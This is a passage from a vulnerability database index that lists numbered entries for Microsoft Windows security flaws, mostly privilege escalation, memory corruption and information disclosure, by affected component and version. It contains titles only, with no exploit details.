to Server 2019 Font Library privilege escalation [139890] Microsoft Windows up to Server 2019 Font Library privilege escalation [139889] Microsoft Windows up to Server 2019 Font Library privilege escalation [139888] Microsoft Windows up to Server 2019 Font Library privilege escalation [139887] Microsoft Windows up to Server 2019 Font Library privilege escalation [139886] Microsoft Windows up to Server 2019 Font Library privilege escalation [139880] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [139879] Microsoft Windows up to Server 2019 DHCP Client memory corruption [139878] Microsoft Windows up to Server 2019 Hyper-V Network Switch privilege escalation [139876] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139875] Microsoft Windows up to Server 2019 Remote Desktop Service DejaBlue privilege escalation [139527] Microsoft Windows PowerShell privilege escalation [137586] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137585] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [137584] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137583] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137582] Microsoft Windows ADFS Security Feature 7PK Security Features [137581] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137580] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137579] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137578] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137577] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137576] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137575] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137574] Microsoft Windows up to Server 2019 DirectWrite memory corruption [137573] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137568] Microsoft Windows up to Server 2019 Remote Desktop Protocol information disclosure [137567] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137566] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137565] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137564] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [137563] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137562] Microsoft Windows up to Server 2019 Win32k information disclosure [137561] Microsoft Windows up to Server 2019 GDI information disclosure [137560] Microsoft Windows up to Server 2019 GDI information disclosure [137559] Microsoft Windows up to Server 2019 DirectWrite information disclosure [137555] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137554] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137553] Microsoft Windows up to Server 2019 Audio Service privilege escalation [137549] Microsoft Windows up to Server 2016 DLL privilege escalation [137544] Microsoft Windows up to Server 2019 Kernel information disclosure [137541] Microsoft Windows up to Server 2019 privilege escalation [137540] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [137539] Microsoft Windows up to Server 2016 DirectX privilege escalation [137538] Microsoft Windows Server 1803/Server 1903/Server 2016/Server 2019 ADFS Security Feature 7PK Security Features [137537] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [137535] Microsoft Windows up to Server 2019 Remote Desktop Service privilege escalation [137533] Microsoft Windows up to Server 2019 SymCrypt privilege escalation [137532] Microsoft Windows DNS Server Data Processing Error [137527] Microsoft Windows up to Server 2019 GDI+ memory corruption [137512] Microsoft Windows up to Server 2019 DHCP memory corruption [136349] Microsoft Windows up to Server 2019 Event Viewer eventvwr.msc information disclosure [136348] Microsoft Windows up to Server 2019 Task Scheduler privilege escalation [136347] Microsoft Windows up to Server 2019 AppXSVC privilege escalation [136345] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [136344] Microsoft Windows up to Server 2019 GDI information disclosure [136343] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136342] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136341] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136340] Microsoft Windows up to Server 2019 GDI information disclosure [136337] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [136336] Microsoft Windows up to Server 2019 Kernel privilege escalation [136335] Microsoft Windows up to Server 2019 NTLM 7PK Security Features [136334] Microsoft Windows up to Server 2019 Kernel information disclosure [136326] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136325] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136324] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136323] Microsoft Windows up to Server 2019 memory corruption [136321] Microsoft Windows 10 1809/10 1903/Server 1903/Server 2019 Audio Service privilege escalation [136320] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136319] Microsoft Windows up to Server 2019 Security Credentials 7PK Security Features [136318] Microsoft Windows up to Server 2019 DirectX privilege escalation [136317] Microsoft Windows up to Server 2019 Win32k privilege escalation [136316] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136315] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136314] Microsoft Windows up to Server 2019 Win32k privilege escalation [136313] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136312] Microsoft Windows up to Server 2019 GDI information disclosure [136311] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136310] Microsoft Windows up to Server 2019 GDI information disclosure [136309] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136308] Microsoft Windows up to Server 2019 Audio Service privilege escalation [136306] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136305] Microsoft Windows up to Server 2019 User Profile Service privilege escalation [136304] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136303] Microsoft Windows up to Server 2019 Storage Service privilege escalation [136302] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136301] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136299] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service 7PK Security Features [136298] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI information disclosure [136297] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [136296] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [136295] Microsoft Windows up to Server 2019 ALPC privilege escalation [136293] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136292] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136291] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136290] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136289] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136288] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [136287] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136286] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136285] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136284] Microsoft Windows up to Server 2019 Kernel privilege escalation [136277] Microsoft Windows 7 SP1/2008 R2 SP1 Speech API memory corruption [136276] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [136275] Microsoft Windows 10/10 1607/10 1703/10 1709/Server 2016 Hyper-V privilege escalation [136274] Microsoft Windows up to Server 2019 ActiveX memory corruption [136273] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [134744] Microsoft Windows up to Server 2019 GDI information disclosure [134733] Microsoft Windows up to Server 2019 Unified Write Filter privilege escalation [134731] Microsoft Windows up to Server 2019 Symlink privilege escalation [134729] Microsoft Windows up to Server 2019 Storage Service privilege escalation [134725] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134724] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134723] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134722] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134721] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134720] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134719] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134718] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134717] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134716] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134715] Microsoft Windows up to Server 2019 Win32k privilege escalation [134714] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134713] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134712] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [134710] Microsoft Windows up to Server 2019 GDI information disclosure [134709] Microsoft Windows up to Server 2019 Kernel privilege escalation [134706] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [134701] Microsoft Windows up to Server 2019 Windows Defender Application Control 7PK Security Features [134700] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [134699] Microsoft Windows up to Server 2019 NDIS ndis.sys privilege escalation [134698] Microsoft Windows up to Server 2019 OLE privilege escalation [134684] Microsoft Windows up to Server 2019 DHCP Server memory corruption [134678] Microsoft Windows up to Server 2019 GDI+ memory corruption [133378] Microsoft Windows 7/8/10/Vista Contact File cross site scripting [133237] Microsoft Windows Admin Center privilege escalation [133236] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133234] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133222] Microsoft Windows up to Server 2019 Remote Registry Service memory corruption [133221] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133220] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133219] Microsoft Windows up to Server 2019 Win32k Memory information disclosure [133218] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133217] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [133216] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133215] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [133214] Microsoft Windows up to Server 2019 AppX Deployment Service privilege escalation [133213] Microsoft Windows up to Server 2019 Kernel Memory information disclosure [133212] Microsoft Windows up to Server 2019 Terminal Services Memory information disclosure [133211] Microsoft Windows up to Server 2019 Task Scheduler information disclosure [133210] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 DirectX information disclosure [133209] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133196] Microsoft Windows up to Server 2019 Win32k information disclosure [133195] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133194] Microsoft Windows up to Server 2019 GDI Memory information disclosure [133193] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133192] Microsoft Windows up to Server 2019 OLE Automation memory corruption [133189] Microsoft Windows up to Server 2019 CSRSS privilege escalation [133188] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133187] Microsoft Windows up to Server 2019 LUAFV Driver luafv.sys privilege escalation [133186] Microsoft Windows up to Server 2019 TCP/IP Stack information disclosure [133185] Microsoft Windows up to Server 2019 Win32k privilege escalation [133183] Microsoft Windows up to Server 2019 Win32k privilege escalation [133182] Microsoft Windows up to Server 2019 Win32k privilege escalation [133180] Microsoft Windows up to Server 2019 MS XML XML External Entity [133179] Microsoft Windows up to Server 2019 MS XML XML External Entity [133177] Microsoft Windows up to Server 2019 Device Guard luafv.sys 7PK Security Features [133174] Microsoft Windows up to Server 2019 GDI+ memory corruption [133173] Microsoft Windows up to Server 2019 IOleCvt Interface privilege escalation [133166] Microsoft Windows up to Server 2019 MS XML XML External Entity [133165] Microsoft Windows up to Server 2019 MS XML XML External Entity [133164] Microsoft Windows up to Server 2019 MS XML XML External Entity [133163] Microsoft Windows up to Server 2019 MS XML XML External Entity [133162] Microsoft Windows up to Server 2019 MS XML XML External Entity [131685] Microsoft Windows up to Server 2019 SMB information disclosure [131683] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Win32k privilege escalation [131681] Microsoft Windows up to Server 2019 Win32k privilege escalation [131679] Microsoft Windows up to Server 2019 Kernel information disclosure [131674] Microsoft Windows up to Server 2019 Win32k information disclosure [131673] Microsoft Windows up to Server 2019 Kernel information disclosure [131672] Microsoft Windows up to Server 2019 GDI information disclosure [131671] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [131668] Microsoft Windows up to Server 2019 AppX Deployment Server privilege escalation [131667] Microsoft Windows up to Server 2019 Comctl32.dll memory corruption [131663] Microsoft Windows up to Server 2019 Print Spooler information disclosure [131658] Microsoft Windows up to Server 2019 information disclosure [131657] Microsoft Windows up to Server 2019 memory corruption [131653] Microsoft Windows up to Server 2019 SMB information disclosure [131652] Microsoft Windows up to Server 2019 SMB information disclosure [131651] Microsoft Windows up to Server 2019 Kernel information disclosure [131650] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [131649] Microsoft Windows up to Server 2019 Kernel privilege escalation [131648] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131644] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [131642] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Active Directory privilege escalation [131638] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [131632] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131631] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131630] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DHCP Client memory corruption [131629] Microsoft Windows up to Server 2019 Deployment Services TFTP Server privilege escalation [131628] Microsoft Windows up to Server 2019 ActiveX memory corruption [131619] Microsoft Windows up to Server 2019 MS XML XML External Entity [131616] Microsoft Windows REG File Message weak authentication [131328] Microsoft Windows up to Server 2016 Kernel information disclosure [130820] Microsoft Windows up to Server 2012 R2 GDI information disclosure [130819] Microsoft Windows Kernel information disclosure [130818] Microsoft Windows up to Server 2019 GDI information disclosure [130817] Microsoft Windows up to Server 2019 Storage Service privilege escalation [130814] Microsoft Windows up to Server 2019 privilege escalation [130809] Microsoft Windows up to Server 2019 Defender Firewall Security 7PK Security Features [130808] Microsoft Windows up to Server 2019 information disclosure [130807] Microsoft Windows up to Server 2019 Hyper-V information disclosure [130806] Microsoft Windows up to Server 2019 SMB Data Processing Error [130805] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130804] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130803] Microsoft Windows up to Server 2019 SMB Data Processing Error [130802] Microsoft Windows up to Server 2019 Win32k information disclosure [130801] Microsoft Windows up to Server 2019 Device Guard privilege escalation [130800] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130799] Microsoft Windows up to Server 2016 Win32k privilege escalation [130798] Microsoft Windows up to Server 2019 GDI information disclosure [130797] Microsoft Windows up to Server 2019 GDI information disclosure [130796] Microsoft Windows up to Server 2019 GDI information disclosure [130793] Microsoft Windows up to Server 2019 GDI information disclosure [130792] Microsoft Windows up to Server 2019 HID information disclosure [130791] Microsoft Windows up to Server 2019 HID information disclosure [130790] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130789] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130788] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130787] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130786] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [130784] Microsoft Windows up to Server 2019 GDI+ memory corruption [130782] Microsoft Windows up to Server 2019 DHCP Server memory corruption [130781] Microsoft Windows up to Server 2019 GDI+ memory corruption [129167] Microsoft Windows VCF File memory corruption [128761] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128760] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128759] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128758] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128757] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128756] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128755] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128754] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128753] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128752] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128751] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128750] Microsoft Windows up to Server 2019 Runtime privilege escalation [128749] Microsoft Windows up to Server 2019 Kernel information disclosure [128739] Microsoft Windows up to Server 2019 Kernel information disclosure [128738] Microsoft Windows up to Server 2019 Subsystem for Linux information disclosure [128737] Microsoft Windows up to Server 2019 COM Desktop Broker privilege escalation [128736] Microsoft Windows up to Server 2019 Kernel information disclosure [128733] Microsoft Windows up to Server 2019 Authentication Request privilege escalation [128730] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [128728] Microsoft Windows up to Server 2019 Kernel information disclosure [128727] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128726] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128725] Microsoft Windows up to Server 2019 Data Sharing Service privilege escalation [128722] Microsoft Windows 10 1803/Server 1803 DHCP Client memory corruption [128718] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [128717] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Hyper-V privilege escalation [127881] Microsoft Windows 10 1809/Server 2019 memory corruption [127880] Microsoft Windows up to Server 2019 Win32k privilege escalation [127828] Microsoft Windows up to Server 2019 Win32k privilege escalation [127827] Microsoft Windows 10 1809/Server 2019 DirectX information disclosure [127826] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 Win32k information disclosure [127823] Microsoft Windows up to Server 2012 R2 Kernel information disclosure [127822] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 Kernel information disclosure [127821] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [127820] Microsoft Windows up to Server 2019 Kernel privilege escalation [127816] Microsoft Windows up to Server 2019 GDI information disclosure [127815] Microsoft Windows up to Server 2019 GDI information disclosure [127812] Microsoft Windows up to Server 2019 Remote Procedure Call information disclosure [127803] Microsoft Windows up to Server 2019 Text-To-Speech memory corruption [127801] Microsoft Windows up to Server 2019 DNS Server memory corruption [126750] Microsoft Windows up to Server 2019 ALPC privilege escalation [126739] Microsoft Windows up to Server 2012 R2 Win32k information disclosure [126737] Microsoft Windows up to Server 2012 R2 DirectX information disclosure [126736] Microsoft Windows up to Server 2019 Win32k privilege escalation [126735] Microsoft Windows up to Server 2019 DirectX privilege escalation [126733] Microsoft Windows 10 1803/10 1809/Server 1803/Server 2019 DirectX privilege escalation [126730] Microsoft Windows up to Server 2019 Active Directory Federation Services cross site scripting [126725] Microsoft Windows up to Server 2019 DirectX privilege escalation [126722] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126718] Microsoft Windows up to Server 2016 Search privilege escalation [126714] Microsoft Windows up to Server 2019 PowerShell privilege escalation [126713] Microsoft Windows up to Server 2019 VBScript Engine memory corruption [126712] Microsoft Windows up to Server 2016 Graphics Component memory corruption [126711] Microsoft Windows up to Server 2019 Deployment Services TFTP Server memory corruption [125123] Microsoft Windows up to Server 2019 Codecs Library information disclosure [125121] Microsoft Windows up to Server 2019 DirectX information disclosure [125120] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125119] Microsoft Windows up to Server 2019 Windows Media Player information disclosure [125115] Microsoft Windows up to Server 2019 Theme API privilege escalation [125114] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [125113] Microsoft Windows up to Server 2019 Kernel privilege escalation [125112] Microsoft Windows 10 1803/Server 1803 Subsystem for Linux privilege escalation [125111] Microsoft Windows up to Server 2019 Device Guard Code Integrity Policy 7PK Security Features [125110] Microsoft Windows up to Server 2019 DNS Global Blocklist 7PK Security Features [125109] Microsoft Windows up to Server 2019 NTFS privilege escalation [125108] Microsoft Windows up to Server 2019 Filter Manager privilege escalation [125103] Microsoft Windows Server 2008 SP2 Graphics Component information disclosure [125101] Microsoft Windows Graphics Component memory corruption [125098] Microsoft Windows up to Server 2019 JET Database Engine privilege escalation [125097] Microsoft Windows up to Server 2019 DirectX Graphics privilege escalation [125096] Microsoft Windows up to Server 2019 Win32k privilege escalation [125093] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125092] Microsoft Windows up to Server 2019 Hyper-V privilege escalation [125091] Microsoft Windows up to Server 2019 MS XML XML External Entity [124217] Microsoft Windows Server 2012/Server 2016 Active Directory Federation Services /adfs/ls privilege escalation [123881] Microsoft Windows up to Server 2016 Sandbox privilege escalation [123874] Microsoft Windows up to Server 2016 Kernel information disclosure [123872] Microsoft Windows 8.1/10/RT 8.1/Server 2012/Server 2012 R2 SMB information disclosure [123868] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123867] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123866] Microsoft Windows 10 1803/Server 1803 Hyper-V privilege escalation [123864] Microsoft Windows up to Server 2016 Hyper-V information disclosure [123853] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel Memory information disclosure [123851] Microsoft Windows up to Server 2016 ALPC privilege escalation [123849] Microsoft Windows up to Server 2016 SMB privilege escalation [123843] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123842] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [123830] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [123828] Microsoft Windows up to Server 2016 Win32k Graphics privilege escalation [123827] Microsoft Windows up to Server 2016 Image privilege escalation [123825] Microsoft Windows up to Server 2016 MSXML Parser XML External Entity [123823] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [122888] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Windows Shell privilege escalation [122886] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122885] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122884] Microsoft Windows up to Server 2016 Win32k privilege escalation [122883] Microsoft Windows up to Server 2016 DirectX Graphics privilege escalation [122861] Microsoft Windows up to Server 2016 Microsoft COM for Windows privilege escalation [122858] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 LNK privilege escalation [122849] Microsoft Windows up to Server 2016 Diagnostic Hub privilege escalation [122848] Microsoft Windows Security Feature 2FA 7PK Security Features [122834] Microsoft Windows up to Server 2016 LNK privilege escalation [122833] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI+ memory corruption [122826] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 PDF memory corruption [122825] Microsoft Windows up to Server 2016 Graphics privilege escalation [121116] Microsoft Windows up to Server 2016 Sandbox privilege escalation [121111] Microsoft Windows up to Server 2016 Kernel privilege escalation [121110] Microsoft Windows up to Server 2016 Wordpad 7PK Security Features [121107] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll Data Processing Error [121092] Microsoft Windows up to Server 2016 FTP Server Data Processing Error [119474] Microsoft Windows up to Server 2016 GDI information disclosure [119471] Microsoft Windows 10 1803/Server 1803 Win32k privilege escalation [119470] Microsoft Windows up to Server 2016 HTTP HTTP.sys Data Processing Error [119469] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 Kernel privilege escalation [119468] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119467] Microsoft Windows up to Server 2016 Hypervisor privilege escalation [119466] Microsoft Windows 10 1709/Server 1709 Hyper-V privilege escalation [119465] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119464] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119463] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119461] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119460] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119459] Microsoft Windows up to Server 2016 privilege escalation [119457] Microsoft Windows up to Server 2016 Desktop Bridge privilege escalation [119456] Microsoft Windows up to Server 2016 Kernel information disclosure [119455] Microsoft Windows up to Server 2016 memory corruption [119454] Microsoft Windows up to Server 2016 Device Guard Code Integrity Policy 7PK Security Features [119453] Microsoft Windows 10 1709/10 1803/Server 1709/Server 1803 WebDAV privilege escalation [119452] Microsoft Windows up to Server 2016 HIDParser privilege escalation [119450] Microsoft Windows 10 1703/10 1709/10 1803/Server 1709/Server 1803 Kernel information disclosure [119448] Microsoft Windows up to Server 2016 Code Integrity Module privilege escalation [119447] Microsoft Windows up to Server 2016 NTFS privilege escalation [119441] Microsoft Windows up to Server 2016 Media Foundation memory corruption [119437] Microsoft Windows up to Server 2016 HTTP Protocol Stack Http.sys Data Processing Error [119436] Microsoft Windows up to Server 2016 privilege escalation [119431] Microsoft Windows up to Server 2016 DNSAPI DNSAPI.dll privilege escalation [117558] Microsoft Windows up to Server 2016 memory corruption [117480] Microsoft Windows up to Server 2016 COM Serialized privilege escalation [117444] Microsoft Windows up to Server 2016 Hyper-V vSMB privilege escalation [117443] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [117442] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [117331] Microsoft Windows Host Compute Host Compute Service Shim privilege escalation [116048] Microsoft Windows up to Server 2016 DirectX Graphics Kernel Subsystem privilege escalation [116047] Microsoft Windows up to Server 2016 OpenType Font Driver atmfd.dll privilege escalation [116045] Microsoft Windows up to Server 2016 JET Database Engine memory corruption [116039] Microsoft Windows up to Server 2016 Remote Desktop Protocol Data Processing Error [116031] Microsoft Windows up to Server 2016 Kernel information disclosure [116030] Microsoft Windows up to Server 2016 SNMP Service Data Processing Error [116026] Microsoft Windows up to Server 2016 Kernel information disclosure [116024] Microsoft Windows up to Server 2016 HTTP.sys privilege escalation [116020] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Active Directory 7PK Security Features [116019] Microsoft Windows up to Server 2016 Kernel information disclosure [116008] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116007] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116006] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116005] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116004] Microsoft Windows up to Server 2016 Graphics Data Processing Error [116003] Microsoft Windows up to Server 2016 VBScript Engine memory corruption [115994] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [115804] Microsoft Windows up to Server 2016 Malware Protection Engine memory corruption [114565] Microsoft Windows 10 1607/10 1703/10 1709/Server 1709/Server 2016 Kernel information disclosure [114550] Microsoft Windows Kernel information disclosure [114548] Microsoft Windows up to Server 2016 CNG Security Feature cng.sys 7PK Security Features [114547] Microsoft Windows up to Server 2016 Kernel information disclosure [114546] Microsoft Windows up to Server 2016 Kernel information disclosure [114545] Microsoft Windows up to Server 2016 Kernel information disclosure [114544] Microsoft Windows up to Server 2016 Kernel information disclosure [114543] Microsoft Windows up to Server 2016 Kernel information disclosure [114542] Microsoft Windows up to Server 2016 Kernel information disclosure [114541] Microsoft Windows up to Server 2016 Kernel information disclosure [114540] Microsoft Windows up to Server 2016 Kernel information disclosure [114536] Microsoft Windows up to Server 2016 CredSSP weak authentication [114535] Microsoft Windows up to Server 2016 Hyper-V privilege escalation [114534] Microsoft Windows 10/10 1511/10 1607/10 1703/10 1709 Scripting Host 7PK Security Features [114531] Microsoft Windows up to Server 2016 Windows Installer privilege escalation [114530] Microsoft Windows up to Server 2016 GDI privilege escalation [114529] Microsoft Windows up to Server 2016 GDI privilege escalation [114528] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2008 SP2 GDI privilege escalation [114527] Microsoft Windows up to Server 2016 Kernel information disclosure [114526] Microsoft Windows up to Server 2016 Kernel information disclosure [114525] Microsoft Windows up to Server 2016 Kernel information disclosure [114522] Microsoft Windows 10 1607/10 1703/Server 2016 Desktop Bridge privilege escalation [114521] Microsoft Windows up to Server 2016 Video Control privilege escalation [114520] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge privilege escalation [114518] Microsoft Windows up to Server 2016 Remote Assistance XML External Entity [114517] Microsoft Windows 10/Server 1709/Server 2016 Desktop Bridge VFS privilege escalation [114516] Microsoft Windows up to Server 2016 Windows Shell privilege escalation [113264] Microsoft Windows 8.1/RT 8.1/Server 2012 R2 SMBv2/SMBv3 denial of service [113262] Microsoft Windows 10/Server 1709 Storage Services privilege escalation [113261] Microsoft Windows 10/Server 1709 Security Feature 7PK Security Features [113260] Microsoft Windows up to Server 2016 Kernel privilege escalation [113259] Microsoft Windows 10/Server 1709/Server 2016 NTFS privilege escalation [113258] Microsoft Windows 10/Server 1709 Kernel information disclosure [113257] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113256] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113255] Microsoft Windows 7 SP1/Server 2008 SP2/Server 2012 Kernel information disclosure [113254] Microsoft Windows up to Server 2016 Kernel information disclosure [113253] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113252] Microsoft Windows up to Server 2016 Kernel privilege escalation [113251] Microsoft Windows 10/Server 1709 Kernel privilege escalation [113250] Microsoft Windows 10/Server 1709/Server 2016 Kernel privilege escalation [113249] Microsoft Windows up to Server 2016 Kernel privilege escalation [113248] Microsoft Windows up to Server 2016 Kernel information disclosure [113247] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113246] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113245] Microsoft Windows 7 SP1/Server 2008 R2 SP1/Server 2012 EOT Font Engine information disclosure [113244] Microsoft Windows 7 SP1/Server 2008 R2 SP1 EOT Font Engine information disclosure [113243] Microsoft Windows 10/Server 2016 MultiPoint Management privilege escalation [113242] Microsoft Windows up to 